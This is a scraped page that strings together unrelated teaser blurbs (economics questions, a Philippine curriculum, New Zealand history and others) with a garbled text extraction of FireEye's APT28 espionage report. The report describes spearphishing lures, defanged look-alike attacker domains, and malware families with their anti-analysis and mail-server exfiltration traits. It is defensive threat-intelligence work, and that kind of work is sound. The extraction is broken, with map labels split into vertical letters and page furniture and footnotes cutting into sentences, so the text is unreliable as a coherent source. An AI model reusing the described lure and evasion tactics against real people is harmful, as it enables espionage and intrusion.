In which situations do you think the transaction costs are so high that they
preclude private bargaining. In what cases are they low enough to allow private
bargains to occur? Explain your answer
14.)From an economic point of view, why is stare decisis an important rule of
decision making for the courts?
.
Philippine Edukasyong Pantahanan at Pangkabuhayan (EPP) CurriculumMJDuyan
(𝐓𝐋𝐄 𝟏𝟎𝟎) (𝐋𝐞𝐬𝐬𝐨𝐧 𝟏)-𝐏𝐫𝐞𝐥𝐢𝐦𝐬
𝐃𝐢𝐬𝐜𝐮𝐬𝐬 𝐭𝐡𝐞 𝐄𝐏𝐏 𝐂𝐮𝐫𝐫𝐢𝐜𝐮𝐥𝐮𝐦 𝐢𝐧 𝐭𝐡𝐞 𝐏𝐡𝐢𝐥𝐢𝐩𝐩𝐢𝐧𝐞𝐬:
- Understand the goals and objectives of the Edukasyong Pantahanan at Pangkabuhayan (EPP) curriculum, recognizing its importance in fostering practical life skills and values among students. Students will also be able to identify the key components and subjects covered, such as agriculture, home economics, industrial arts, and information and communication technology.
𝐄𝐱𝐩𝐥𝐚𝐢𝐧 𝐭𝐡𝐞 𝐍𝐚𝐭𝐮𝐫𝐞 𝐚𝐧𝐝 𝐒𝐜𝐨𝐩𝐞 𝐨𝐟 𝐚𝐧 𝐄𝐧𝐭𝐫𝐞𝐩𝐫𝐞𝐧𝐞𝐮𝐫:
-Define entrepreneurship, distinguishing it from general business activities by emphasizing its focus on innovation, risk-taking, and value creation. Students will describe the characteristics and traits of successful entrepreneurs, including their roles and responsibilities, and discuss the broader economic and social impacts of entrepreneurial activities on both local and global scales.
Level 3 NCEA - NZ: A Nation In the Making 1872 - 1900 SML.pptHenry Hollis
The History of NZ 1870-1900.
Making of a Nation.
From the NZ Wars to Liberals,
Richard Seddon, George Grey,
Social Laboratory, New Zealand,
Confiscations, Kotahitanga, Kingitanga, Parliament, Suffrage, Repudiation, Economic Change, Agriculture, Gold Mining, Timber, Flax, Sheep, Dairying,
THE SACRIFICE HOW PRO-PALESTINE PROTESTS STUDENTS ARE SACRIFICING TO CHANGE T...indexPub
The recent surge in pro-Palestine student activism has prompted significant responses from universities, ranging from negotiations and divestment commitments to increased transparency about investments in companies supporting the war on Gaza. This activism has led to the cessation of student encampments but also highlighted the substantial sacrifices made by students, including academic disruptions and personal risks. The primary drivers of these protests are poor university administration, lack of transparency, and inadequate communication between officials and students. This study examines the profound emotional, psychological, and professional impacts on students engaged in pro-Palestine protests, focusing on Generation Z's (Gen-Z) activism dynamics. This paper explores the significant sacrifices made by these students and even the professors supporting the pro-Palestine movement, with a focus on recent global movements. Through an in-depth analysis of printed and electronic media, the study examines the impacts of these sacrifices on the academic and personal lives of those involved. The paper highlights examples from various universities, demonstrating student activism's long-term and short-term effects, including disciplinary actions, social backlash, and career implications. The researchers also explore the broader implications of student sacrifices. The findings reveal that these sacrifices are driven by a profound commitment to justice and human rights, and are influenced by the increasing availability of information, peer interactions, and personal convictions. The study also discusses the broader implications of this activism, comparing it to historical precedents and assessing its potential to influence policy and public opinion. The emotional and psychological toll on student activists is significant, but their sense of purpose and community support mitigates some of these challenges. However, the researchers call for acknowledging the broader Impact of these sacrifices on the future global movement of FreePalestine.
Gender and Mental Health - Counselling and Family Therapy Applications and In...PsychoTech Services
A proprietary approach developed by bringing together the best of learning theories from Psychology, design principles from the world of visualization, and pedagogical methods from over a decade of training experience, that enables you to: Learn better, faster!
Leveraging Generative AI to Drive Nonprofit InnovationTechSoup
In this webinar, participants learned how to utilize Generative AI to streamline operations and elevate member engagement. Amazon Web Service experts provided a customer specific use cases and dived into low/no-code tools that are quick and easy to deploy through Amazon Web Service (AWS.)
A Visual Guide to 1 Samuel | A Tale of Two HeartsSteve Thomason
These slides walk through the story of 1 Samuel. Samuel is the last judge of Israel. The people reject God and want a king. Saul is anointed as the first king, but he is not a good king. David, the shepherd boy is anointed and Saul is envious of him. David shows honor while Saul continues to self destruct.
How Barcodes Can Be Leveraged Within Odoo 17Celine George
In this presentation, we will explore how barcodes can be leveraged within Odoo 17 to streamline our manufacturing processes. We will cover the configuration steps, how to utilize barcodes in different manufacturing scenarios, and the overall benefits of implementing this technology.
APT28 A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS.docx
1. APT28:
A WINDOW INTO RUSSIA’S CYBER
ESPIONAGE OPERATIONS?
SPECIAL REPORT
SECURITY
REIMAGINED
2 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
EXECUTIVE SUMMARY
...............................................................................................
...............................................................................................
..................................................................................... 3
APT28 TARGETING REFLECTS RUSSIAN INTERESTS
...............................................................................................
......................................................................... 6
APT28 interest in the Caucasus, Particularly Georgia
...............................................................................................
............................................................ 7
APT28 Targeting of the Georgian Ministry of Internal Affairs
(MIA)
....................................................................................... 8
2. APT28 Targeting of the Georgian Ministry of Defense
...............................................................................................
........................................ 9
APT28 Targeting a Journalist Covering the Caucasus
...............................................................................................
....................................... 10
APT28’s Other Targets in the Caucasus
...............................................................................................
........................................................................................ 11
APT28 Targeting of Eastern European Governments and
Militaries
...............................................................................................
.... 12
APT28 Targeting of NATO and Other European Security
Organizations
............................................................................. ....... 14
APT28 Targets European Defense Exhibitions
...............................................................................................
................................................................ 16
Other APT28 Targets Are Consistent With Nation State
Interests
...............................................................................................
......... 17
APT28 MALWARE INDICATES SKILLED RUSSIAN
DEVELOPERS
...............................................................................................
......................... 19
Modular Implants Indicate a Formal Development
3. Environment............................................................................
................................... 24
APT28 Malware Indicates Russian Speakers in a Russian Time
Zone
...............................................................................................
. 25
Compile Times Align with Working Hours in Moscow and St.
Petersburg ............................................................... 27
CONCLUSION
...............................................................................................
...............................................................................................
...............................................................................................
.................... 28
APPENDIX A: DISTINGUISHING THREAT GROUPS
...............................................................................................
.......................................................................... 29
APPENDIX B: TIMELINE OF APT28 LURES
...............................................................................................
...............................................................................................
........... 30
APPENDIX C: SOURFACE/CORESHELL
...............................................................................................
...............................................................................................
....................... 31
APPENDIX D: CHOPSTICK
...............................................................................................
...............................................................................................
..................................................................... 35
4. APPENDIX E: OLDBAIT
...............................................................................................
...............................................................................................
.................................................................................. 43
CONTENTS
3 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
1 Markoff, John. “Before the Gunfire, Cyberattacks”. The New
York Times 12 August 2008. Web.
http://www.nytimes.com/2008/08/13/technology/13cyber.html
2 Knowlton, Brian. “Military Computer Attack Confirmed”.
The New York Times. 25 August 2010. Web.
http://www.nytimes.com/2010/08/26/
technology/26cyber.html
EXECUTIVE SUMMARY
In this paper we discuss a threat group whose
malware is already fairly well-known in the
cybersecurity community. This group, unlike the
China-based threat actors we track, does not
appear to conduct widespread intellectual
property theft for economic gain. Nor have we
observed the group steal and profit from
financial account information.
The activity that we profile in this paper
appears to be the work of a skilled team of
developers and operators collecting intelligence
5. on defense and geopolitical issues – intelligence
that would only be useful to a government. We
believe that this is an advanced persistent
threat (APT) group engaged in espionage
against political and military targets including
the country of Georgia, Eastern European
governments and militaries, and European
security organizations since at least 2007.
They compile malware samples with Russian
language settings during working hours
consistent with the time zone of Russia’s major
cities, including Moscow and St. Petersburg.
While we don’t have pictures of a building,
personas to reveal, or a government agency to
name, what we do have is evidence of long-
standing, focused operations that indicate a
government sponsor – specifically, a
government based in Moscow.
We are tracking this group as APT28.
Our clients often ask us to assess the threat Russia poses in
cyberspace. Russia has
long been a whispered frontrunner among capable nations for
performing
sophisticated network operations. This perception is due in part
to the Russian
government’s alleged involvement in the cyber attacks
accompanying its invasion of
Georgia in 2008, as well as the rampant speculation that
Moscow was behind a
major U.S. Department of Defense network compromise, also in
2008. These
rumored activities, combined with a dearth of hard evidence,
6. have made Russia into
something of a phantom in cyberspace.
4 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
KEY FINDINGS
GEORGIA EASTERN EUROPE SECURITY ORGANIZATIONS
APT28 likely seeks to collect intelligence
about Georgia’s security and political
dynamics by targeting officials working
for the Ministry of Internal Affairs and
the Ministry of Defense.
APT28 has demonstrated interest in
Eastern European governments and
security organizations. These victims
would provide the Russian government
with an ability to predict policymaker
intentions and gauge its ability to
influence public opinion.
APT28 appeared to target individuals
affiliated with European security
organizations and global multilateral
institutions. The Russian government
has long cited European security
organizations like NATO and the OSCE
as existential threats, particularly during
periods of increased tension in Europe.
7. APT28 targets insider information
related to governments, militaries, and
security organizations that would
likely benefit the Russian government.
5 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
KEY FINDINGS
• Malware compile times suggest that APT28 developers
have consistently updated their tools over the last
seven years.
• APT28 malware, in particular the family of modular
backdoors that we call CHOPSTICK, indicates
a formal code development environment. Such an
environment would almost certainly be required to
track and define the various modules that can be
included in the backdoor at compile time.
• APT28 tailors implants for specific victim
environments. They steal data by configuring their
implants to send data out of the network using a victim
network’s mail server.
• Several of APT28’s malware samples contain counter-
analysis capabilities including runtime checks to
identify an analysis environment, obfuscated strings
unpacked at runtime, and the inclusion of unused
machine instructions to slow analysis.
8. Indicators in APT28’s malware suggest that the group consists
of
Russian speakers operating during business hours in Russia’s
major cities.
More than half of the malware samples with Portable
Executable (PE) resources that we have attributed to APT28
included Russian language settings (as opposed to neutral or
English settings), suggesting that a significant portion of
APT28 malware was compiled in a Russian language build
environment consistently over the course of six years (2007
to 2013).
Over 96% of the malware samples we have attributed to APT28
were compiled between Monday and Friday. More than 89%
were compiled between 8AM and 6PM in the UTC+4 time zone,
which parallels the working hours in Moscow and St.
Petersburg. These samples had compile dates ranging from
mid-2007 to September 2014.
Since 2007, APT28 has systematically evolved its malware,
using flexible and lasting platforms indicative of plans for
long-term use. The coding practices evident in the group’s
malware suggest both a high level of skill and an interest in
complicating reverse engineering efforts.
Malware compile times suggest
that APT28 developers have
consistently updated their tools
over the last seven years.
6 fireeye.com
9. APT 28: A Window into Russia’s Cyber Espionage Operations?
Three themes in APT28’s targeting clearly
reflect areas of specific interest to an
Eastern European government, most likely
the Russian government.
7 Bloomberg. “Neiman Marcus Hackers Set Off 60,000 Alerts
While Bagging Credit Card Data.” February 2014.
8 Ibid.
9 Ibid.
APT28 TARGETING REFLECTS
M
any of APT28’s targets align generally
with interests that are typical of any
government. However, three themes in
APT28’s targeting clearly reflects areas of specific
interest to an Eastern European government, most
likely the Russian government. These include the
Caucasus (especially the Georgian government),
Eastern European governments and militaries, and
specific security organizations.
APT28 uses spearphishing emails to target its
victims, a common tactic in which the threat group
crafts its emails to mention specific topics (lures)
relevant to recipients. This increases the
likelihood that recipients will believe that the
email is legitimate and will be interested in
opening the message, opening any attached files,
or clicking on a link in the body of the email. Since
spearphishing lures are tailored to the recipients
10. whose accounts APT28 hopes to breach, the
subjects of the lures provide clues as to APT28’s
targets and interests. For example, if the group’s
lures repeatedly refer to the Caucasus, then this
most likely indicates that APT28 is trying to gain
access to the accounts of individuals whose work
pertains to the Caucasus. Similarly, APT28’s practice
of registering domains that mimic those of legitimate
news, politics, or other websites indicates topics that
are relevant to APT28’s targets.
We identified three themes in APT28’s lures and
registered domains, which together are
particularly relevant to the Russian government.
In addition to these themes, we have seen APT28
target a range of political and military
organizations. We assess that the work of these
organizations serves nation state governments.
RUSSIAN
INTERESTS
The Caucasus,
particularly the
country of Georgia
Eastern European
governments and
militaries
The North Atlantic
Treaty Organization
(NATO) and other
European security
organizations
11. APT 28: Three Themes
7 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
T
he Caucasus, a region that includes
Chechnya and other Russian republics and
the independent states of Georgia,
Armenia, and Azerbaijan, continues to experience
political unrest. The Georgian government’s
posture and ties to the West are a frequent
source of Moscow’s frustration, particularly after
the 2008 war. Overall, issues in the Caucasus
likely serve as focal points for Russian
intelligence collection efforts.
APT28 INTEREST IN
THE CAUCASUS,
PARTICULARLY GEORGIA
Since 2011, APT28 has used lures written in
Georgian that are probably intended to target
Georgian government agencies or citizens.
APT28 is likely seeking information on Georgia’s
security and diplomatic postures. Specifically,
the group has targeted the Georgian Ministry of
Internal Affairs (MIA) and the Ministry of
Defense (MOD). We also observed efforts to
target a journalist working on issues in the
Caucasus and a controversial Chechen news site.
12. RUSSIA
Chechnya
GEORGIA
Abkhazia
TURKEY
ARMENIA
AZERBAIJAN
Tbilisi
Armenian Military
Yerevan
Kavkaz Center
8 fireeye.com
APT28 Targeting of the Georgian
Ministry of Internal Affairs (MIA)
The MIA harbors sensitive information about the
inner workings of Georgia’s security operations, the
country’s engagement in multilateral institutions,
and the government’s communications backbone. It
is responsible for3:
• Policing, internal security, and border patrols
• Counterintelligence
• Counterterrorism
• International relations
13. • Defense of Georgia’s strategic facilities
and assets
• “Operative-Technical” tasks
APT28 made at least two specific attempts to
target the MIA. In one case, we identified an
APT28 lure from mid-2013 that referenced
MIA-related topics and employed malware that
attempted to disguise its activity as legitimate
MIA email traffic. The lure consisted of a
weaponized Excel file that presented a decoy
document containing a list of Georgian driver’s
3 Georgian Ministry of Internal Affairs website
http://police.ge/en/home
4 Queries on the author yielded a LinkedIn page for a person of
the same name who serves as a system administrator in Tbilisi.
license numbers. The backdoor attempted to
establish a connection to a Georgian MIA mail
server and communicate via MIA email addresses
ending with “@mia.ge.gov”. Once connected to the
mail server, APT28’s backdoor sent an email
message using a subject line related to driver’s
licenses (in Georgian), and attached a file
containing system reconnaissance information.
This tactic could allow APT28 to obtain data from
the MIA’s network through a less-monitored
route, limiting the MIA network security
department’s abilities to detect the traffic.
In the second example of MIA targeting, an APT28
lure used an information technology-themed decoy
document that included references to the Windows
domain “MIA UsersOrtachala…” (Figure 1).
14. This probably referred to the MIA facility in the
Ortachala district of Tbilisi, Georgia’s capital city.
The decoy document also contains metadata listing
“MIA” as the company name and “Beka Nozadze”4
as an author, a possible reference to a system
administrator in Tbilisi. The text of the document
purports to provide domain and user group setup
APT28 made at least two specific attempts to target
the Georgian Ministry of Internal Affairs.
Georgian Ministry of Internal Affairs (MIA)
APT 28: A Window into Russia’s Cyber Espionage Operations?
9 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
Figure 1: Georgian MIA-related decoy
information for internal Windows XP and Windows
7 systems. APT28 possibly crafted this document
to appear legitimate to all MIA system users and
intended to breach the MIA network specifically
using the embedded malware.
APT28 Targeting of the Georgian
Ministry of Defense
APT28 also appeared to target Georgia’s MOD
along with a U.S. defense contractor that was
training the Georgian military. APT28 used a lure
document that installed a SOURFACE downloader
15. (further discussed in the Malware section) and
contained a listing of birthdays for members of a
working group between the Georgian MOD and
the U.S. defense contractor. The U.S. contractor
was involved in a working group to advise the MOD
and Georgian Armed Forces, assess Georgia’s
military capabilities, and develop a military training
program for the country.
10 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
Figure 2: Excerpt of APT28’s letter to a journalist writing on
Caucasus-related issues
We believe that APT28’s targeting of the MOD
aligns with Russian threat perceptions. The
growing U.S.-Georgian military relationship has
been a source of angst for Russia. Georgia and
Russia severed diplomatic relations following the
Russia-Georgia War in 2008, and Georgia has
since sought to align itself more closely with
western security organizations. Additionally, in
June 2014, despite Russia’s vocal objections,
Georgia, along with Ukraine and Moldova, signed
association accords with the EU.5 This move
placed all three countries more firmly in the EU’s
political, economic, and security spheres of
influence. Georgian military security issues,
particularly with regard to U.S. cooperation and
NATO, provide a strong incentive for Russian
state-sponsored threat actors to steal information
that sheds light on these topics.
16. APT28 Targeting a Journalist Covering
the Caucasus
Another one of APT28’s lures appeared to target
a specific journalist covering issues in the
Caucasus region. In late 2013, APT28 used a lure
that contained a letter addressing a journalist by
his first name and claiming to originate from a
“Chief Coordinator” in Reason Magazine’s
“Caucasian Issues Department” - a division that
does not appear to exist.6 (Reason Magazine is a
US-based magazine) The letter welcomed the
individual as a contributor and requested topic
ideas and identification information in order to
establish him at the magazine. In the background,
the decoy document installed a SOURFACE
backdoor on the victim’s system.
We wish our cooperation will be both profitable and trusted.
Our aim in the Caucasian region is
to help people who struggle for their independence, liberty and
human rights. We all know, that
world is often unfair and cruel, but all together we can make it
better.
Send your articles on this email – in Russian or English, please.
There are some difficulties with
Caucasian languages, but we’ll solve the problem pretty soon, I
hope.
5 “The EU’s Association Agreements with Georgia, the
Republic of Moldova and Ukraine”. European Union Press
Release Database. 23 June 2014.
Web. http://e uropa.eu/rapid/press-release_MEMO-14-
430_en.htm
17. 6 We attempted to identify candidate journalists in the country.
One of these was a Georgian national of Chechen descent,
whose work appears to center on
Chechen and human rights issues. Ultimately, however, we
cannot confirm the identity of the target(s).
Targeting journalists could provide APT28 and its sponsors
with a way to monitor public opinion, identify dissidents,
spread disinformation, or facilitate further targeting.
11 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
The body of the letter suggests that APT28 actors
are able to read at least two languages – Russian
and English. The grammar of the letter also
indicates that English is not the author’s first
language, despite it purportedly originating from a
US-based magazine. This implies that Russian may
be the APT28 author’s preferred language.
Targeting journalists could provide APT28 and its
sponsors with a way to monitor public opinion,
identify dissidents, spread disinformation, or
facilitate further targeting. Several other nation
states are suspected of targeting journalists and
dissidents to monitor their activity, including China
and Iran.7,8 Journalists in the Caucasus working on
Caucasus independence issues would be a prime
target for intelligence collection for Moscow.
Journalists critical of the Kremlin have long
been targets of surveillance and harassment,
18. and a number of governments and human
rights organizations have publicly criticized the
government for its treatment of journalists and its
increasing consolidation of control over the media.9
APT28’s Other Targets in the Caucasus
We have seen APT28 register at least two
domains mimicking the domains of legitimate
organizations in the Caucasus, as shown in the
table below. One APT28 domain imitated a key
Chechen-focused news website, while the other
appeared to target members of the Armenian
military by hosting a fake login page.
Of particular note, the Kavkaz Center is a
Chechen-run website designed to present an
alternative view to the long-running conflict
between Russia and Chechen separatists. In
200410 and 2013,11 Russia’s Foreign Minister
voiced his displeasure that a Swedish company
continues to host the Kavkaz Center website.
7 Moran, Ned, Villeneuve, Nart, Haq, Thofique, and Scott,
Mike. “Operation Saffron Rose”. FireEye. 13 May 2014. Web.
http://www.fireeye.com/blog/technical/
malware-research/2014/05/operation-saffron-rose.html
8 The New York Times publicly disclosed their breach by
APT12, which they assess was motivated by the China-based
actors’ need to know what the
newspaper was publishing about a controversial topic related to
corruption and the Chinese Communist Party’s leadership.
9 “Russia”. Freedom House Press Release. 2013. Web.
http://www.freedomhouse.org/report/freedom-
press/2013/russia#.VD8fe9R4rew
19. 10“Chechen website promotes terror: Lavrov”. UPI. 16
November 2014. Web.
http://www.upi.com/Top_News/2004/11/16/Chechen-website-
promotes-
terror-Lavrov/UPI-11601100627922/
11“Lavrov urges Sweden to ban Chechen website server” The
Voice of Russia. 15 May 2013. Web.
http://voiceofrussia.com/news/2013_05_15/Lavrov-urges-
Sweden-to-ban-Chechen-website-server/
Table 1: Examples of APT28 domains imitating organizations in
the Caucasus
APT28 Domain Real Domain
kavkazcentr[.]info The Kavkaz Center / The Caucasus Center,
an international Islamic news agency with coverage of Islamic
issues, particularly Russia and Chechnya (kavkazcenter.com)
rnil[.]am Armenian military (mil.am)
12 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
E
astern European countries’ political and
military postures are traditionally core Russian
government interests. The Kremlin has long
regarded the former Soviet Republics and satellite
states as in its sphere of economic, political, and
20. military interest. Over the past two decades, as many
of these states joined NATO and the EU, Russia has
attempted to regain its influence in the region. Many
of APT28’s targets parallel this continued focus on
Eastern European governments and militaries.
APT28 Targets Eastern European
Government Organizations
We have evidence that APT28 made at least two
attempts to compromise Eastern European
government organizations:
• In a late 2013 incident, a FireEye device
deployed at an Eastern European Ministry of
Foreign Affairs detected APT28 malware in
the client’s network.
• More recently, in August 2014 APT28 used a
lure (Figure 3) about hostilities surrounding a
Malaysia Airlines flight downed in Ukraine in
a probable attempt to compromise the Polish
government. A SOURFACE sample employed
in the same Malaysia Airlines lure was
referenced by a Polish computer security
company in a blog post.12 The Polish security
company indicated that the sample was “sent
to the government,” presumably the Polish
government, given the company’s location
and visibility.
12 “MHT, MS12-27 Oraz *malware*.info” [email protected] 11
August 2014. Web.
http://malware.prevenity.com/2014/08/malware-info.html
Figure 3: Decoy MH17
document probably sent
21. to the Polish government
APT28 TARGETING OF
EASTERN EUROPEAN
GOVERNMENTS AND
MILITARIES
13 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
APT28 has registered domains similar to those of
legitimate Eastern European news sites and
governments, listed in Table 2. These domain
registrations not only suggest that APT28 is
interested in Eastern European political affairs,
but also that the group targets Eastern European
governments directly.
In addition, APT28 used one domain for command
and control sessions (baltichost[.]org) that was
themed after the Baltic Host exercises. Baltic Host
is a multinational logistics planning exercise, hosted
annually since 2009 by one of the three Baltic
States (Estonia, Latvia, and Lithuania, all three of
which are on Russia’s border) on a rotational basis.
In June 2014, this event was integrated with a
larger U.S. Army training event, and focused on
exercises to improve interoperability with regional
allies and partners.13, 14
This domain registration suggests that APT28
sought to target individuals either participating in
the exercises or interested in Baltic military and
22. security matters. Such targets would potentially
provide APT28 with sensitive tactical and
strategic intelligence concerning regional military
capabilities and relationships. These exercises are
a particular point of interest in Moscow: pro-
Kremlin press cited Russia’s interpretation of
these military exercises and NATO’s involvement
as a “sign of aggression,” and Russia’s Foreign
Minister publicly stated that the exercise was “a
demonstration of hostile intention.”15
Table 2: Examples of APT28 domains imitating legitimate
Eastern European organization names
APT28 Domain Real Domain
standartnevvs[.]com Bulgarian Standart News website
(standartnews.com)
novinitie[.]com, n0vinite[.]com Bulgarian Sofia News Agency
website (novinite.com)
qov[.]hu[.]com Hungarian government domain (gov.hu)
q0v[.]pl, mail[.]q0v[.]pl Polish government domain (gov.pl) and
mail server domain (mail.gov.pl)
poczta.mon[.]q0v[.]pl Polish Ministry of Defense mail server
domain (poczta.mon.gov.pl)
13 “Saber Strike and Baltic Host kick off in Latvia, Lithuania
and Estonia’. Estonian Defense Forces. 9 June 2014. Web. 11
June 2014. http://www.mil.ee/en/
news/8251/saber-strike-and-baltic-host-kick-off-in-latvia,-
lithuania-and-estonia
23. 14 “Baltic Host 2014 rendering host nation support for the
training audience of Exercise Saber Strike 2014 and repelling
faked cyber-attacks”. Republic of
Lithuania Ministry of National Defense. 12 June 2014. Web.
http://www.kam.lt/en/news_1098/current_issues/baltic_host_20
14_rendering_host_nation_
support_for_the_training_audience_of_exercise_saber_strike_20
14_and_repelling_faked_cyber-attacks.html
15 “Tanks, troops, jets: NATO countries launch full-scale war
games in Baltic”. Russia Today. 9 June 2014. Web.
http://rt.com/news/164772-saber-strike-
exercise-nato/
We have evidence that APT28 made at least two attempts
to compromise Eastern European government
organizations.
14 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
A
PT28’s lures and domain registrations also
demonstrate their interest in NATO and
other European security organizations.
NATO remains a chief Russian adversary, or in the
words of Russia’s 2010 military doctrine, a “main
external military danger” particularly as it moves
“closer to the borders of the Russian Federation.”16
As the traditional western counterweight to the
24. Soviet Union, Russia regards NATO, particularly
NATO’s eastward expansion, as a threat to Russia’s
strategic stability. APT28 also registered a domain
name imitating the Organization for Security
and Cooperation in Europe (OSCE), an
intergovernmental organization that has cited
widespread fraud in numerous Russian state
elections. Insider information about NATO, the
OSCE and other security organizations would
inform Russian political and military policy.
Several of the domains APT28 registered imitated
NATO domain names, including those of NATO
Special Operations Headquarters and the NATO
Future Forces Exhibition. We also observed a user
that we suspect works for NATO HQ submit an
APT28 sample to VirusTotal, probably as a result
of receiving a suspicious email.
Table 3: Examples of APT28 domains imitating legitimate
NATO and security websites
APT28 Domain Real Domain
nato.nshq[.]in NATO Special Operations Headquarters
(nshq.nato.int)
natoexhibitionff14[.]com NATO Future Forces 2014 Exhibition
& Conference (natoexhibition.org)
login-osce[.]org Organization for Security and Cooperation in
Europe (osce.org)
16 The Military Doctrine of the Russian Federation, approved
by Presidential edict on 5 February 2010.
25. APT28 TARGETING OF
NATO AND OTHER
EUROPEAN SECURITY
ORGANIZATIONS
15 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
Figure 5: Ankara
Military Attache Corps
decoy document
APT28 also demonstrated an interest in defense
attaches working in European countries. We identified
an APT28 lure containing a decoy document with a list
of British officers and U.S. and Canadian military
attachés in London.
Finally, APT28 used a lure that contained an apparent
non-public listing of contact information for defense
attachés in the “Ankara Military Attaché Corps (AMAC),”
which appears to be a professional organization of
defense attachés in Turkey.
Figure 4: Decoy
document used
against military
attaches in 2012
16 fireeye.com
26. APT 28: A Window into Russia’s Cyber Espionage Operations?
APT28 Targets European
Defense Exhibitions
In addition to targeting European security
organizations and governments, it appears that
APT28 is targeting attendees of European
defense exhibitions. Some of the APT28-
registered domains imitated those of defense
events held in Europe, such as the Farnborough
Airshow 2014, EuroNaval 2014, EUROSATORY
2014, and the Counter Terror Expo. In September
2014, APT28 registered a domain (smigroup-
online.co[.]uk) that appeared to mimic that for the
SMi Group, a company that plans events for the
“Defence, Security, Energy, Utilities, Finance and
Pharmaceutical sectors.” Among other events, the
SMi Group is currently planning a military satellite
communications event for November 2014.
Targeting organizations and professionals
involved in these defense events would likely
provide APT28 with an opportunity to procure
intelligence pertaining to new defense
technologies, as well as the victim organizations’
operations, communications, and future plans.
Targeting organizations and
professionals involved in
these defense events would
likely provide APT28 with an
opportunity to procure
intelligence pertaining to
new defense technologies.
27. 17 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
A
PT28 has targeted a variety of organizations
that fall outside of the three themes we
highlighted above. However, we are not
profiling all of APT28’s targets with the same
detail because they are not particularly indicative
of a specific sponsor’s interests. They do indicate
parallel areas of interest to many governments
and do not run counter to Russian state interests.
Other probable APT28 targets that we have
identified:
• Norwegian Army (Forsvaret)
• Government of Mexico
• Chilean Military
• Pakistani Navy
• U.S. Defense Contractors
• European Embassy in Iraq
• Special Operations Forces Exhibition (SOFEX)
in Jordan
• Defense Attaches in East Asia
• Asia-Pacific Economic Cooperation (APEC)
• Al-Wayi News Site
OTHER APT28 TARGETS
ARE CONSISTENT
28. WITH NATION STATE
INTERESTS
INTERNATIONAL ORGANIZATION
European Commission
UN Office for the Coordination of Humanitarian Affairs
APEC
NATO
OSCE
World Bank
OTHER
Hizb ut-Tahir
Chechnya Global
Diplomatic Forum
Military Trade Shows
KEY
APT28 Registered Domains
Lure Document
Phishing Email
29. APT 28: A Window into Russia’s Cyber Espionage Operations?
18 fireeye.com
KEY
APT28 Registered Domains
Lure Document
Phishing Email
US DEFENSE ATTACHES AND US DEFENSE
CONTRACTORS
MEXICAN
GOVERN
MENT
CANADIAN DEFENSE ATTACHES
CH
ILE
AN
M
ILI
TA
RY
SO
U
31. DEFENSE ATTACHES IN TURKEY
AFGHANI NEW
S W
EBSITE
PAKASTANI MILITARY
IRANIAN ACADEMICS
EUROPEAN EMBASSY IN IRAQ
EMIRATI NEWS WEBSITE
DEFENSE ATTACHES IN CHINA
DEFENSE ATTACHES IN SOUTH KOREA
DEFENSE ATTA
CHES IN JAPAN
H
U
N
G
ARIAN
G
O
VERN
M
34. AT
IA
N
U
N
IV
ER
SI
TYUK DEFENSE ATTACHES
NO
RW
EG
IAN M
ILITARY
19 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
APT28 MALWARE INDICATES
SKILLED RUSSIAN
DEVELOPERS
A
PT28’s tools are suggestive of the group’s
skills, ambitions, and identity. Our analysis
35. of some of the group’s more commonly
used tools indicates that APT28 has been
systematically updating their tools since 2007.
APT28 is most likely supported by a group of
developers creating tools intended for long-term
use and versatility, who make an effort to
obfuscate their activity. This suggests that APT28
receives direct ongoing financial and other
resources from a well-established organization,
most likely a nation state government. APT28’s
malware settings suggest that the developers
have done the majority of their work in a Russian
language build environment during Russian
business hours, which suggests that the Russian
government is APT28’s sponsor.
Some of APT28’s more commonly used tools are
the SOURFACE downloader, its second stage
backdoor EVILTOSS, and a modular family of
implants that we call CHOPSTICK.
• SOURFACE: This downloader is typically
called Sofacy within the cyber security
community. However because we have
observed the name “Sofacy” used to refer to
APT28 malware generally (to include the
SOURFACE dropper, EVILTOSS,
CHOPSTICK, and the credential harvester
OLDBAIT), we are using the name
SOURFACE to precisely refer to a specific
downloader. This downloader obtains a
second-stage backdoor from a C2 server.
CORESHELL is an updated version of
SOURFACE.
36. • EVILTOSS: This backdoor has been delivered
through the SOURFACE downloader to gain
system access for reconnaissance,
monitoring, credential theft, and shellcode
execution.
• CHOPSTICK: This is a modular implant
compiled from a software framework that
provides tailored functionality and flexibility.
Our analysis of some of the group’s more
commonly used tools indicates that APT28
has been systematically updating their
malware since 2007.
20 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
A number of the malware variants that we profile
below, especially the CHOPSTICK family,
demonstrate formal coding practices indicative of
methodical, diligent programmers. The modularity
of CHOPSTICK alone, with its flexible and lasting
platform, demonstrates planning for long-term
use and versatility. We have also noted that
APT28 tailors implants to their target
environments, configuring them to use local
network resources such as email servers.
APT28 has attempted to obfuscate their code and
implement counter-analysis techniques:
Figure 6: Typical deployment of SOURFACE ecosystem
37. Spearphishing Email
Document with exploit
Dropper malware
SOURFACE downloader
Deploys 2nd stage droppers
2nd stage implant
Obtains 2nd stage C2 Server
• One of the latest samples of CORESHELL
includes counter-reverse engineering tactics
via unused machine instructions. This would
hinder static analysis of CORESHELL behavior
by creating a large amount of unnecessary
noise in the disassembly.
• A number of CORESHELL droppers also
conduct runtime checks, attempting to
determine if they are executing in an analysis
environment, and if so, they do not trigger
their payloads.
• Many samples across the SOURFACE/
CORESHELL, CHOPSTICK, and EVILTOSS
21 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
38. malware families obfuscate strings that are
decoded at runtime. Two of the malware
families (SOURFACE/CORESHELL and
EVILTOSS) use the same decryption
sequence and similar algorithms for string
encoding and decoding. These families
encode their strings at compile time using a
custom stream cipher. From a high level,
these ciphers share a similar design across
the malware families but differ slightly in the
internal arithmetic operations.
